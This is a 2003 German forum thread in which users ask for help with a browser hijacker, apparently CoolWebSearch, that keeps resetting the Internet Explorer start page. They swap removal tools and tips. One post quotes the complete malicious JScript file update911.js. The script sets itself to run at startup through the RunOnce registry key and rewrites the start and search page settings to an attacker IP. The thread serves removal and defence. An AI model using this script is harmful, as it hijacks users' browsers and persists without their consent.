Startseite

Dieses Thema im Forum "Browser" wurde erstellt von BadBehaviour, 15. Dezember 2003.

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. BadBehaviour

    BadBehaviour ROM

    Registriert seit:
    15. Dezember 2003
    Beiträge:
    6
    Ich habe das Problem, dass sich eine Internet Adresse selbsttätig in meinen Internet Explorer als Startseite eingetragen hat (http://81.211.105.9/index.php?v=1)
    Wie bekomme ich diese wieder weg?
    Wenn ich es über Extras/internetoptionen ändere ist nach dem Neustart wieder die besagte Seite als Startseite eingetragen.
    Auch wenn ich den Explorer Offline öffne.
     
  2. ManniBear

    ManniBear Megabyte

    Registriert seit:
    23. Februar 2002
    Beiträge:
    1.970
    Indem ich per Google und im Spybot-Forum nach dem Begriff "t.rack.cc" gesucht habe.

    Das Programm gibt es schon länger und wird immer wieder aktualisiert, da die CWS-Macher sich immer wieder neue Tricks einfallen lassen. Nachzulesen hier:

    http://www.spywareinfo.com/~merijn/cwschronicles.html

    Und auch dir wünsche ich schöne Feiertage!

    Mfg Manni
     
  3. blackstingray

    blackstingray ROM

    Registriert seit:
    22. Dezember 2003
    Beiträge:
    2
    Vielen Dank Manni !

    Das Programm hat mein Problem gelöst.
    Hatte mir schon seit Tagen den Kopf darüber zerbrochen und gleich neu installieren wollte ich auch nicht unbedingt.
    Wie bist Du denn auf das Programm gestoßen? Würde mich mal interessieren !

    Also nochmals Danke und noch schöne Feiertage !

    Gruß, Rainer !
     
  4. ManniBear

    ManniBear Megabyte

    Registriert seit:
    23. Februar 2002
    Beiträge:
    1.970
    @ blackstingray

    Scheint sich um eine CoolWebSearch-Infektion zu handeln. Du solltest das darauf spezialisierte Programm CWShredder (ist vom selben Autor wie HijackThis) mal dein System überprüfen lassen:

    http://www.merijn.org/files/cwshredder.zip

    Mfg Manni
     
  5. blackstingray

    blackstingray ROM

    Registriert seit:
    22. Dezember 2003
    Beiträge:
    2
    Hallo !

    Habe ebenfalls Probleme damit, daß meine Startseite immer wieder mit der URL : t.rack.cc/h.php?aid=331 überschrieben wird.
    Die oben schon genannte Datei existiert aber bei mir nicht.
    Muß bei mir wohl einen anderen Namen haben.
    Wie kann ich diese Datei aufspüren ?
    Bitte um Hilfe !
    Danke im Voraus !

    PS: habe bereits spybot installiert, findet zwar die geänderten Registrierungseinträge, aber nicht den Verursacher.
     
  6. Damocles

    Damocles Halbes Megabyte

    Registriert seit:
    20. März 2003
    Beiträge:
    781
    Hi!
    Ich habe ein ähnliches Problem. ich kann nicht meine Startseite angeben. das ist nur grau!
    Kennt wer die Lösung?

    Jh
     
  7. Hovercraft

    Hovercraft Kbyte

    Registriert seit:
    12. Dezember 2000
    Beiträge:
    197
    Hi Kromb14,

    Danke nochmal, hatte diesen Bullshit auch bei mir drauf. Verstehe nicht warum ADAWARE da nicht gemeckert hat. Naja.
    Wenn es sonst weiter nichts ist. Wir kann eigentlich so ne Sch...JScript überhaupt sich im Windows Ordner festkrallen?

    Gruß HOVERCRAFT


    PS: Hätte der Symantec Firewall da etwas gemeldet?
     
  8. Kromb14

    Kromb14 ROM

    Registriert seit:
    27. August 2000
    Beiträge:
    4
    Habe das selbe problem,
    habe im Ordner Windows die datei update911.js
    gefunden mit folgenden Inhalt:

    var url = "http://81.211.105.9/index.php?v=1";
    var burl = "http://81.211.105.9/search.php?v=1";
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var tfolder = fso.GetSpecialFolder(0);
    var filepath = tfolder + "\\update911.js";
    var Shell = new ActiveXObject("WScript.Shell");
    Shell.RegWrite(" HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
    \\RunOnce\\tlc",filepath);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

    Die Datei löschen/umbennen und die regestrie einträge entfernen,
    bei Extras und Interneteinstellung auf leere Seite stellen,
    Neustart durchführen und schon klappt alles wieder.
     
  9. John Cage

    John Cage Byte

    Registriert seit:
    28. Januar 2002
    Beiträge:
    8
    Gucke doch mal in Deinem Windows\system32 Ordner nach, ob sich da eine neue exe.datei eingeschlichen hat !

    John Cage
     
  10. ManniBear

    ManniBear Megabyte

    Registriert seit:
    23. Februar 2002
    Beiträge:
    1.970
    Welche Startseite wird denn aufgerufen?

    Ansonsten solltest du mit HijackThis ein Logfile erstellen und dieses dann hier posten. So kann man evtl. feststellen wo das Problem liegt.

    Mfg Manni
     
  11. MT

    MT Byte

    Registriert seit:
    22. August 2001
    Beiträge:
    8
    Ich hab genau das selbe Problem mit der Startseite.

    Mein System hab ich mit Spybot, Adaware und Pestpatrol und Virenscanner durchsucht und nichts gefunden. Auch nach Löschen aller Cookies und temporary Internetfiles kommt die selbe Startseite.
    Es lassen sich auch in der Registry die Einträge die sich auf die Startseite beziehen nicht dauerhaft ändern. Die "Super Search" Startseite kommt immer wieder!

    Gibt es Patches oder Fixes für dieses Problem?
     
  12. goemichel

    goemichel Guest

    Dann versuch es mal mit "adaware" :)
     
  13. goemichel

    goemichel Guest

    oops, natürlich erst aktualisieren, die Version 1.2 ist schon etwas alt in der Grundausstattung. ;)
     
  14. goemichel

    goemichel Guest

  15. BadBehaviour

    BadBehaviour ROM

    Registriert seit:
    15. Dezember 2003
    Beiträge:
    6
    ebenfalls kein erfolg :(
    Ich glaube ich werde mir einen neuen Explorer drauf spielen müssen.
    Welchen kann man den empfehlen bzw welcher ist (zumindest vom aussehen) ähnlich?
     
  16. BadBehaviour

    BadBehaviour ROM

    Registriert seit:
    15. Dezember 2003
    Beiträge:
    6
    Habe ich auch.
    hat auch ein paar dateien/keys gefunden, aber mein Problem nicht gelöst...
     
  17. BadBehaviour

    BadBehaviour ROM

    Registriert seit:
    15. Dezember 2003
    Beiträge:
    6
    Program downloaden, ausführen, ferig, problem besteht immernoch.
     
Status des Themas:
Es sind keine weiteren Antworten möglich.

Diese Seite empfehlen